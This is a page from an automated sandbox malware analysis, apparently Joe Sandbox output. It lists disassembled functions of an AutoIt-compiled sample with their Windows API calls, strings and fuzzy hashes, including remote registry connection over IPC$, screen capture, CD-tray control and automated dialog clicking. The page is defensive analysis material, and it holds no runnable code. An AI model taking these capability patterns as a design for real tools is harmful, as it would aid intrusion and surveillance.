Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: e02ea62804b6d638f75f7f170ebd46f0941939daca718b7f860a20e5837b9ed3
Instruction ID: 18a780c9cf51f88cbf0e28937443cc8f9124ddb649903945ef6ef6b6a62688cd
Opcode Fuzzy Hash: e02ea62804b6d638f75f7f170ebd46f0941939daca718b7f860a20e5837b9ed3
Instruction Fuzzy Hash: 33916C71204701DFCB14EF24C865B6EB7A5AF95350F14886CF9966B3A2CB39ED09CB81

Function 007CB7FE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007C6B11,?), ref: 007CB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007CB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CB9C3
FreeLibrary.KERNEL32(?), ref: 007CB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CB9DF
DestroyCursor.USER32(?), ref: 007CB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CBA17

Part of subcall function 00762EFD: __wcsicmp_l.LIBCMT ref: 00762F86

Strings

.icl, xrefs: 007CB82A
.exe, xrefs: 007CB84A
@U=u, xrefs: 007CB9F7
.dll, xrefs: 007CB86D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 3907162815-1639919054
Opcode ID: 8e5c662e25e7cd112621fba880f622ec7e07aa29ead410f94e919a9f8ffbd78a
Instruction ID: 0406f290af9a10cd9343ffa1f80dad265b2fe7b3e6bcb535cfbd20c7a7a3fed5
Opcode Fuzzy Hash: 8e5c662e25e7cd112621fba880f622ec7e07aa29ead410f94e919a9f8ffbd78a
Instruction Fuzzy Hash: A361CCB1900619FAEB14DF64CC46FBA7BACEB08710F10811DFE15D61D1DB78A990DBA0

Function 007AA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

CharLowerBuffW.USER32(?,?), ref: 007AA3CB
GetDriveTypeW.KERNEL32 ref: 007AA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA4C5

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Strings

set cd door , xrefs: 007AA466
open , xrefs: 007AA427
type cdaudio alias cd wait, xrefs: 007AA443
close, xrefs: 007AA3D1
close cd wait, xrefs: 007AA4B0
closed, xrefs: 007AA3DF, 007AA3E8
open, xrefs: 007AA3F2
wait, xrefs: 007AA482

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 5b85c2b89fb404057adc0b766473dd72941fc903440357f17c0b39f1cdf39a1a
Instruction ID: 21c78ff86b3db7fa73e8ff079de4902419ab2fb864b73d92d1dcf727825f0fff
Opcode Fuzzy Hash: 5b85c2b89fb404057adc0b766473dd72941fc903440357f17c0b39f1cdf39a1a
Instruction Fuzzy Hash: 56518D71104305DFC744EF24C88596BB3E8EF89718F00896DF88657262DB39ED09CB92

Function 0079F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0077E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0079F8DF
LoadStringW.USER32(00000000,?,0077E029,00000001), ref: 0079F8E8

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0077E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0079F90A
LoadStringW.USER32(00000000,?,0077E029,00000001), ref: 0079F90D
__swprintf.LIBCMT ref: 0079F95D
__swprintf.LIBCMT ref: 0079F96E
_wprintf.LIBCMT ref: 0079FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079FA2E

Strings

Line %d (File "%s"):, xrefs: 0079F957
Error: , xrefs: 0079F9E5
%s (%d) : ==> %s: %s %s, xrefs: 0079FA12
^ ERROR, xrefs: 0079F9C3
Line %d:, xrefs: 0079F968

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 35d365172c6e8d55ce2aab77c91bdf6d0cf482ce8c4b4280df3e5e575311b350
Instruction ID: afb6ae51d91394674d7177f89d3372156423a136b85da5de8b4692697309e78a
Opcode Fuzzy Hash: 35d365172c6e8d55ce2aab77c91bdf6d0cf482ce8c4b4280df3e5e575311b350
Instruction Fuzzy Hash: ED411C7290450DEACF08EBE0DD8AEEE7778AF14300F504465F505B61A2EB396F49CB61

Function 00746A8C Relevance: 21.5, APIs: 4, Strings: 8, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00760957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00746B0C,?,00008000), ref: 00760973

Part of subcall function 00744750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00744743,?,?,007437AE,?), ref: 00744770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00746CFA

Part of subcall function 0074586D: _wcscpy.LIBCMT ref: 007458A5

Part of subcall function 0076363D: _iswctype.LIBCMT ref: 00763645

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0077E496
Bad directive syntax error, xrefs: 0077E79D
/vt, xrefs: 0077E4ED, 0077E511
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0077E421
Unterminated string, xrefs: 0077E7E4
Error opening the file, xrefs: 0077E43D, 0077E4B8
EA06, xrefs: 0077E452
AU3!, xrefs: 00746B61

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$/vt$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-4047200331
Opcode ID: ea53e9d9954a799e5e66c638b25b011cfb6d1df5854b816c52a54b4c434eee79
Instruction ID: ca419302840fab085bb8d2a8e78fa5f12be63cc7215cae02061395a02b9c096f
Opcode Fuzzy Hash: ea53e9d9954a799e5e66c638b25b011cfb6d1df5854b816c52a54b4c434eee79
Instruction Fuzzy Hash: 06028C70508340DFCB14EF24C885AAFBBE5EF99354F10491DF49A972A2DB38E949CB52

Function 007AD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 007ADA10
_wcscat.LIBCMT ref: 007ADA28
_wcscat.LIBCMT ref: 007ADA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007ADA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 007ADA63
GetFileAttributesW.KERNEL32(?), ref: 007ADA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 007ADA95
SetCurrentDirectoryW.KERNEL32(?), ref: 007ADAA7

Strings

*.*, xrefs: 007ADAE6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 4eeb41d374bba1886cd60adc86d8c61d71d5970705c3501933f88a0f3672a253
Instruction ID: b6137cfeaa13e6b3c7f771231c53e9522ccd96ddfe7a3f9632cdf6faa4dd454d
Opcode Fuzzy Hash: 4eeb41d374bba1886cd60adc86d8c61d71d5970705c3501933f88a0f3672a253
Instruction Fuzzy Hash: F88171715042419FCB74DF64C8449ABB7E9EBCA310F148A2EF88AC7651E738ED45CB52

Function 007B731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007B738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007B739B
CreateCompatibleDC.GDI32(?), ref: 007B73A7
SelectObject.GDI32(00000000,?), ref: 007B73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007B7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007B7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007B7468
SelectObject.GDI32(00000006,?), ref: 007B7470
DeleteObject.GDI32(?), ref: 007B7479
DeleteDC.GDI32(00000006), ref: 007B7480
ReleaseDC.USER32(00000000,?), ref: 007B748B

Strings

(, xrefs: 007B7410

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 91f9cd11d27da16bc4a7fc28bb7a4d8fdac43c622258cd7fb922c6f0b1bfc7c6
Instruction ID: 7a8db8390b807cf71895b8ba9d14d2af641bb9a2c0dd943f97141f7322c4744e
Opcode Fuzzy Hash: 91f9cd11d27da16bc4a7fc28bb7a4d8fdac43c622258cd7fb922c6f0b1bfc7c6
Instruction Fuzzy Hash: 53513975904349EFCB14CFA8CC85EAEBBB9EF88710F14852DF99AA7211C735A940CB54

Function 007A4F75 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007A4F7A

Part of subcall function 0076049F: timeGetTime.WINMM(?,753DB400,00750E7B), ref: 007604A3

Sleep.KERNEL32(0000000A), ref: 007A4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 007A4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007A4FEC
SetActiveWindow.USER32 ref: 007A500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 007A5038
Sleep.KERNEL32(000000FA), ref: 007A5043
IsWindow.USER32 ref: 007A504F
EndDialog.USER32(00000000), ref: 007A5060

Strings

BUTTON, xrefs: 007A4FDE
@U=u, xrefs: 007A5019, 007A5038

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: e8c10b122f0d2e36c56da1c5abc028d5590a7e8d22466978433929a53db5e9fd
Instruction ID: c55618b238bc781d32dbdc8c70f2630fac04b50a11e0e5ce20c98d90cccaf427
Opcode Fuzzy Hash: e8c10b122f0d2e36c56da1c5abc028d5590a7e8d22466978433929a53db5e9fd
Instruction Fuzzy Hash: 80219370204605AFE7505F30EC89E273BAAFB86745F085228F501862B1DBB98D709B76

Function 007A2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007A2DDD
GetMenuItemCount.USER32(00805890), ref: 007A2E66
DeleteMenu.USER32(00805890,00000005,00000000,000000F5,?,?), ref: 007A2EF6
DeleteMenu.USER32(00805890,00000004,00000000), ref: 007A2EFE
DeleteMenu.USER32(00805890,00000006,00000000), ref: 007A2F06
DeleteMenu.USER32(00805890,00000003,00000000), ref: 007A2F0E
GetMenuItemCount.USER32(00805890), ref: 007A2F16
SetMenuItemInfoW.USER32(00805890,00000004,00000000,00000030), ref: 007A2F4C
GetCursorPos.USER32(?), ref: 007A2F56
SetForegroundWindow.USER32(00000000), ref: 007A2F5F
TrackPopupMenuEx.USER32(00805890,00000000,?,00000000,00000000,00000000), ref: 007A2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007A2F7E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: a0af918eca9fb979736ebbfc28d74717815cc8fa0f8fde5bbe6a52d8dce3e9d0
Instruction ID: d8f4e0b3faf3a81c9795d89cc8946d1b7f8e41bbc94654b506b321175ed275fc
Opcode Fuzzy Hash: a0af918eca9fb979736ebbfc28d74717815cc8fa0f8fde5bbe6a52d8dce3e9d0
Instruction Fuzzy Hash: AE71F470604205BEEB218F1CDC49FAABF65FF86324F10431AF625A61E2C7796C61DB94

Function 007977DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

_memset.LIBCMT ref: 0079786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007978A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007978BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007978D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00797902
CLSIDFromString.COMBASE(?,?), ref: 0079792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00797935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079793A

Strings

SOFTWARE\Classes\, xrefs: 0079780C
\IPC$, xrefs: 00797882
\CLSID, xrefs: 00797822

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 9731a68cef7baf40c9244d4c175891ea342fb55ec920c675f7d4aa180b6aa6fb
Instruction ID: 177a262057b5d57c83cbdae56aec6d81db0751dbeffd5805a5ca0300fe84dbbf
Opcode Fuzzy Hash: 9731a68cef7baf40c9244d4c175891ea342fb55ec920c675f7d4aa180b6aa6fb
Instruction Fuzzy Hash: AF41D77281462DEBCF19EBA4DC89DEDB779FF04750B404469E905A3161EB385D04CBA0

Function 007C0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BFDAD,?,?), ref: 007C0E31

Strings

HKU, xrefs: 007C0F43
HKEY_CLASSES_ROOT, xrefs: 007C0EC4
HKEY_USERS, xrefs: 007C0F32
HKEY_CURRENT_CONFIG, xrefs: 007C0EEE
HKEY_LOCAL_MACHINE, xrefs: 007C0E9A
HKLM, xrefs: 007C0EAF
HKCR, xrefs: 007C0ED9
HKCU, xrefs: 007C0F21
HKEY_CURRENT_USER, xrefs: 007C0F10
HKCC, xrefs: 007C0EFF

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: d947590a55981a2e99fa196fe7a26a233136adba64b14d2f5d510c5c1200e6cc
Instruction ID: 90a73a867cef0830ba7ee2354979766825a1b38fdac024e2b35678c67b592312
Opcode Fuzzy Hash: d947590a55981a2e99fa196fe7a26a233136adba64b14d2f5d510c5c1200e6cc
Instruction Fuzzy Hash: 2741243110024ACBCF14EE50D859BFF3764AF21354F54442CFD962B2A2DB38A99ACBE0

Function 007C74BB Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007C755E
CreateCompatibleDC.GDI32(00000000), ref: 007C7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007C7578
SelectObject.GDI32(00000000,00000000), ref: 007C7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 007C758B
DeleteDC.GDI32(00000000), ref: 007C7594
GetWindowLongW.USER32(?,000000EC), ref: 007C759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007C75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007C75BE

Strings

static, xrefs: 007C74F6
@U=u, xrefs: 007C7578

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: dd95ad447c51e0196ca3ea97a119cc711490179cd40858bda4b3258522dd6cc6
Instruction ID: 2a2dd27aff6395c8b97cdc1e9527c61e01ba2682b2735c54731918319987ff7f
Opcode Fuzzy Hash: dd95ad447c51e0196ca3ea97a119cc711490179cd40858bda4b3258522dd6cc6
Instruction Fuzzy Hash: 31316C72104218ABDF159F64EC09FDB3B6AFF09720F11422CFA15A61A0CB39D821DBA4

Function 0079F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0077E2A0,00000010,?,Bad directive syntax error,007CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0079F7C2
LoadStringW.USER32(00000000,?,0077E2A0,00000010), ref: 0079F7C9

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

_wprintf.LIBCMT ref: 0079F7FC
__swprintf.LIBCMT ref: 0079F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0079F88D

Strings

., xrefs: 0079F873
Error: , xrefs: 0079F85B
Line %d (File "%s"):, xrefs: 0079F833
%s (%d) : ==> %s.: %s %s, xrefs: 0079F7F7
Line %d:, xrefs: 0079F818

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
